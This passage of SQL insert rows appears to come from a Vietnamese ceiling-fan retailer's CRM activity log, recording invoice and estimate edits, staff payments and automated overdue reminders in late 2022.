(1377, 'invoice', 225, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-19 11:24:34'),
(1378, 'estimate', 136, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/225\">INV-216-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-19 11:24:34'),
(1379, 'invoice', 225, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"30\";}', '1', 'Ho Gia Phat', '2022-11-19 11:29:54'),
(1380, 'invoice', 220, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-11-19 13:45:18'),
(1381, 'invoice', 220, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/231\" target=\"_blank\">#231</a>\";}', '17', 'Loan Nguyễn', '2022-11-19 13:45:18'),
(1382, 'invoice', 223, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-11-19 13:46:33'),
(1383, 'invoice', 223, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.700.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/232\" target=\"_blank\">#232</a>\";}', '17', 'Loan Nguyễn', '2022-11-19 13:46:33'),
(1384, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-20 08:44:58'),
(1385, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-20 08:45:02'),
(1386, 'estimate', 137, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-21 08:59:55'),
(1387, 'estimate', 137, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-21 09:34:19'),
(1388, 'invoice', 226, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-21 09:42:47'),
(1389, 'estimate', 137, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/226\">INV-DRAFT</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-21 09:42:47'),
(1390, 'invoice', 226, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-21 10:04:39'),
(1391, 'invoice', 226, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-21 11:44:50'),
(1392, 'invoice', 226, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/233\" target=\"_blank\">#233</a>\";}', '1', 'Ho Gia Phat', '2022-11-21 11:44:50'),
(1393, 'invoice', 169, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:34:\"Haiku 60 inch Cocoa/Caramel Bamboo\";i:1;s:4:\"2.00\";i:2;s:1:\"3\";}', '1', 'Ho Gia Phat', '2022-11-21 14:02:03'),
(1394, 'invoice', 169, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";i:1;s:4:\"1.00\";i:2;s:1:\"7\";}', '1', 'Ho Gia Phat', '2022-11-21 14:02:03'),
(1395, 'invoice', 169, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:34:\"Haiku I 60 inch White with SenseME\";i:1;s:4:\"4.00\";i:2;s:1:\"2\";}', '1', 'Ho Gia Phat', '2022-11-21 14:02:03'),
(1396, 'invoice', 226, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-21 15:29:09'),
(1397, 'estimate', 138, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-11-21 16:27:56'),
(1398, 'invoice', 227, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-21 16:29:07'),
(1399, 'estimate', 138, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/227\">INV-218-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-21 16:29:07'),
(1400, 'invoice', 227, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '1', 'Ho Gia Phat', '2022-11-21 16:29:22'),
(1401, 'invoice', 227, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-21 16:29:55'),
(1402, 'invoice', 227, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"16.830.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/234\" target=\"_blank\">#234</a>\";}', '1', 'Ho Gia Phat', '2022-11-21 16:29:55'),
(1403, 'invoice', 228, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-11-21 17:26:45'),
(1404, 'invoice', 228, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:59:\"Quạt trần SAONA 52 LED WHITE 52YFT-7062W (màu trắng)\";}', '17', 'Loan Nguyễn', '2022-11-21 17:27:30'),
(1405, 'invoice', 228, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:52:\"Quạt trần SAONA OKA 52YFT-7062A (màu vân gỗ)\";}', '17', 'Loan Nguyễn', '2022-11-21 17:27:30'),
(1406, 'invoice', 228, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-11-21 17:30:05'),
(1407, 'invoice', 228, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.060.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/235\" target=\"_blank\">#235</a>\";}', '17', 'Loan Nguyễn', '2022-11-21 17:30:05'),
(1408, 'invoice', 229, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-22 12:44:18'),
(1409, 'invoice', 229, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:44:\"Bộ đèn LED thay thế:<br />\r\nSAONA LED \";i:1;s:37:\"Bộ đèn LED thay thế:\r\nSAONA LED\";}', '1', 'Ho Gia Phat', '2022-11-22 12:44:51'),
(1410, 'invoice', 229, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"15\";i:1;s:2:\"35\";}', '1', 'Ho Gia Phat', '2022-11-22 12:44:51'),
(1411, 'invoice', 229, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"350000.00\";i:1;s:6:\"200000\";}', '1', 'Ho Gia Phat', '2022-11-22 12:45:19'),
(1412, 'invoice', 229, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"35\";i:1;s:0:\"\";}', '1', 'Ho Gia Phat', '2022-11-22 12:45:19'),
(1413, 'invoice', 229, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-22 12:45:55'),
(1414, 'invoice', 229, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2022-11-22 12:45:55'),
(1415, 'invoice', 229, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";i:1;s:4:\"3.00\";i:2;s:1:\"0\";}', '1', 'Ho Gia Phat', '2022-11-23 09:32:53'),
(1416, 'invoice', 229, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-23 09:33:02'),
(1417, 'invoice', 229, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"550.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/236\" target=\"_blank\">#236</a>\";}', '1', 'Ho Gia Phat', '2022-11-23 09:33:02'),
(1418, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-24 08:58:10'),
(1419, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-24 08:58:14'),
(1420, 'invoice', 225, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-25 04:15:45'),
(1421, 'invoice', 225, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.420.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/237\" target=\"_blank\">#237</a>\";}', '1', 'Ho Gia Phat', '2022-11-25 04:15:45'),
(1422, 'invoice', 230, 'invoice_activity_created', '', '16', 'Tuyền Ngọc', '2022-11-26 14:16:14'),
(1423, 'invoice', 230, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"35\";}', '16', 'Tuyền Ngọc', '2022-11-26 14:24:15'),
(1424, 'estimate', 139, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-26 15:57:42'),
(1425, 'estimate', 139, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-26 16:01:19'),
(1426, 'estimate', 139, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"1000000.00\";i:1;s:6:\"500000\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-26 16:01:19'),
(1427, 'invoice', 230, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '16', 'Tuyền Ngọc', '2022-11-28 11:28:08'),
(1428, 'invoice', 230, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.270.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/238\" target=\"_blank\">#238</a>\";}', '16', 'Tuyền Ngọc', '2022-11-28 11:28:08'),
(1429, 'estimate', 139, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";i:1;s:4:\"2.00\";i:2;s:1:\"1\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-28 14:43:44'),
(1430, 'estimate', 139, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-28 14:43:44'),
(1431, 'estimate', 139, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:66:\"Thi công lắp đặt đường dây điện cấp nguồn quạt\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-28 15:20:21'),
(1432, 'invoice', 231, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-28 15:33:05'),
(1433, 'estimate', 139, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/231\">INV-DRAFT</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-28 15:33:05'),
(1434, 'invoice', 231, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-28 15:35:41'),
(1435, 'invoice', 231, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-28 15:35:41'),
(1436, 'invoice', 231, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '16', 'Tuyền Ngọc', '2022-11-28 15:52:26'),
(1437, 'invoice', 231, 'invoice_activity_marked_as_sent', 'a:0:{}', '16', 'Tuyền Ngọc', '2022-11-28 15:52:26'),
(1438, 'invoice', 231, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"170000.00\";i:1;s:9:\"280000.00\";}', '16', 'Tuyền Ngọc', '2022-11-29 13:09:20'),
(1439, 'invoice', 232, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-29 14:29:54'),
(1440, 'invoice', 231, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"280000.00\";i:1;s:9:\"170000.00\";}', '16', 'Tuyền Ngọc', '2022-11-29 14:42:49'),
(1441, 'invoice', 233, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-29 14:53:23'),
(1442, 'invoice', 233, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:387:\"Sải cánh 152cm ( ~ 60inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nTuỳ chọn đèn: N/A (không có) <br />\r\n\";i:1;s:348:\"Sải cánh 152cm ( ~ 60inch) \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện) \r\nMàu cánh: Gỗ sáng (Maple Wood) \r\nTuỳ chọn đèn: N/A (không có)\";}', '1', 'Ho Gia Phat', '2022-11-29 14:55:21'),
(1443, 'invoice', 233, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6800000.00\";i:1;s:7:\"4650000\";}', '1', 'Ho Gia Phat', '2022-11-29 14:55:21'),
(1444, 'invoice', 233, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"35\";i:1;s:0:\"\";}', '1', 'Ho Gia Phat', '2022-11-29 14:55:21'),
(1445, 'invoice', 233, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-29 14:56:34'),
(1446, 'invoice', 233, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2022-11-29 14:56:34'),
(1447, 'invoice', 231, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"170000.00\";i:1;s:9:\"850000.00\";}', '16', 'Tuyền Ngọc', '2022-11-29 16:03:02'),
(1448, 'invoice', 231, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:44:\"Cáp điện 1.5m2 CVV (cáp điện Cadivi)\";i:1;s:170:\"Cáp điện 1.5m2 CVV (cáp điện Cadivi) bao gồm vật tư (dây điện, ống luồn dây điện...), nhân công thi công điện và thay đổi độ cao ty.\";}', '16', 'Tuyền Ngọc', '2022-11-29 16:22:32'),
(1449, 'invoice', 231, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"850000.00\";i:1;s:6:\"170000\";}', '16', 'Tuyền Ngọc', '2022-11-29 16:49:25'),
(1450, 'estimate', 120, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-30 08:37:20'),
(1451, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-30 09:18:22'),
(1452, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-30 09:18:26'),
(1453, 'invoice', 232, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:527:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China <br />\r\n\";i:1;s:476:\"Sải cánh 132cm ( ~ 52inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nĐèn LED: 3 màu, 2700K - 3000K  \r\nĐiều khiển từ xa 5 tốc độ đi kèm  \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '1', 'Ho Gia Phat', '2022-11-30 09:21:17'),
(1454, 'invoice', 232, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-30 09:21:26'),
(1455, 'invoice', 232, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.250.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/239\" target=\"_blank\">#239</a>\";}', '1', 'Ho Gia Phat', '2022-11-30 09:21:26'),
(1456, 'invoice', 234, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-30 09:25:27'),
(1457, 'estimate', 140, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-11-30 10:30:33'),
(1458, 'estimate', 140, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:64:\"Gia cố ống ty nối dài - trụ ty dành cho quạt trần \";i:1;s:63:\"Gia cố ống ty nối dài - trụ ty dành cho quạt trần\";}', '1', 'Ho Gia Phat', '2022-11-30 10:39:24'),
(1459, 'estimate', 140, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"550000.00\";i:1;s:9:\"650000.00\";}', '1', 'Ho Gia Phat', '2022-11-30 10:39:24'),
(1460, 'invoice', 235, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-30 10:39:30'),
(1461, 'estimate', 140, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/235\">INV-226-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-30 10:39:30'),
(1462, 'invoice', 164, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-11-30 10:39:51'),
(1463, 'invoice', 231, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"170000.00\";i:1;s:5:\"25000\";}', '1', 'Ho Gia Phat', '2022-11-30 12:12:19'),
(1464, 'invoice', 231, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:66:\"Thi công lắp đặt đường dây điện cấp nguồn quạt\";i:1;s:4:\"1.00\";i:2;s:2:\"20\";}', '1', 'Ho Gia Phat', '2022-11-30 12:12:19'),
(1465, 'estimate', 139, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:53:\"Gia cố móc ty treo quạt trần tấm thạch cao\";}', '1', 'Ho Gia Phat', '2022-11-30 12:17:19'),
(1466, 'estimate', 139, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:45:\"Gia cố móc ty treo quạt trần bê tông\";}', '1', 'Ho Gia Phat', '2022-11-30 12:17:19'),
(1467, 'estimate', 139, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"170000.00\";i:1;s:6:\"500000\";}', '1', 'Ho Gia Phat', '2022-11-30 12:17:19'),
(1468, 'estimate', 139, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:27:\"Ống ty treo quạt trần\";}', '1', 'Ho Gia Phat', '2022-11-30 12:17:19'),
(1469, 'invoice', 231, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:8:\"25000.00\";i:1;s:6:\"800000\";}', '18', 'Phương Mỹ', '2022-11-30 13:46:55'),
(1470, 'invoice', 231, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:66:\"Thi công lắp đặt đường dây điện cấp nguồn quạt\";i:1;s:5:\"20.00\";i:2;s:1:\"1\";}', '18', 'Phương Mỹ', '2022-11-30 13:46:55'),
(1471, 'invoice', 231, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '18', 'Phương Mỹ', '2022-11-30 14:24:11'),
(1472, 'invoice', 231, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/240\" target=\"_blank\">#240</a>\";}', '18', 'Phương Mỹ', '2022-11-30 14:24:11'),
(1473, 'invoice', 235, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:67:\"Gia cố móc treo quạt trần tấm thạch cao - bê tông = 1m\";i:1;s:125:\"Chi phí làm gia cố móc treo quạt trần tấm thạch cao + bê tông = 1m\r\n(chưa bao gồm thuê, lắp giàn giáo)\";}', '1', 'Ho Gia Phat', '2022-11-30 18:00:04'),
(1474, 'estimate', 2, 'estimate_activity_client_declined', '', NULL, '', '2022-12-01 13:16:58'),
(1475, 'invoice', 231, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";}', '18', 'Phương Mỹ', '2022-12-02 12:27:48'),
(1476, 'invoice', 231, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '18', 'Phương Mỹ', '2022-12-02 12:27:48'),
(1477, 'invoice', 231, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"800000.00\";i:1;s:6:\"500000\";}', '18', 'Phương Mỹ', '2022-12-02 12:31:24'),
(1478, 'invoice', 231, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '18', 'Phương Mỹ', '2022-12-02 13:56:43'),
(1479, 'invoice', 236, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-12-02 17:52:59'),
(1480, 'invoice', 236, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:324:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:293:\"Sải cánh 132cm ( ~ 52inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  \r\nĐèn LED: 3 màu, 2700K - 3000K  \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2022-12-02 17:57:04'),
(1481, 'invoice', 236, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"650000.00\";i:1;s:10:\"6500000.00\";}', '17', 'Loan Nguyễn', '2022-12-02 17:57:04'),
(1482, 'invoice', 236, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"20\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2022-12-02 17:57:04'),
(1483, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:35:\"Quạt trần KATRINA 52 Gray Maple\";}', '17', 'Loan Nguyễn', '2022-12-02 17:57:04'),
(1484, 'invoice', 236, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-12-02 17:57:04'),
(1485, 'invoice', 236, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:527:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China <br />\r\n\";i:1;s:476:\"Sải cánh 132cm ( ~ 52inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nĐèn LED: 3 màu, 2700K - 3000K  \r\nĐiều khiển từ xa 5 tốc độ đi kèm  \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '17', 'Loan Nguyễn', '2022-12-02 18:00:22'),
(1486, 'invoice', 236, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6500000.00\";i:1;s:10:\"6300000.00\";}', '17', 'Loan Nguyễn', '2022-12-02 18:11:21'),
(1487, 'invoice', 236, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"25\";i:1;s:2:\"20\";}', '17', 'Loan Nguyễn', '2022-12-02 18:11:21'),
(1488, 'invoice', 236, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";}', '1', 'Ho Gia Phat', '2022-12-02 18:53:38'),
(1489, 'invoice', 236, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:35:\"Quạt trần KATRINA 52 Gray Maple\";}', '1', 'Ho Gia Phat', '2022-12-02 18:53:38'),
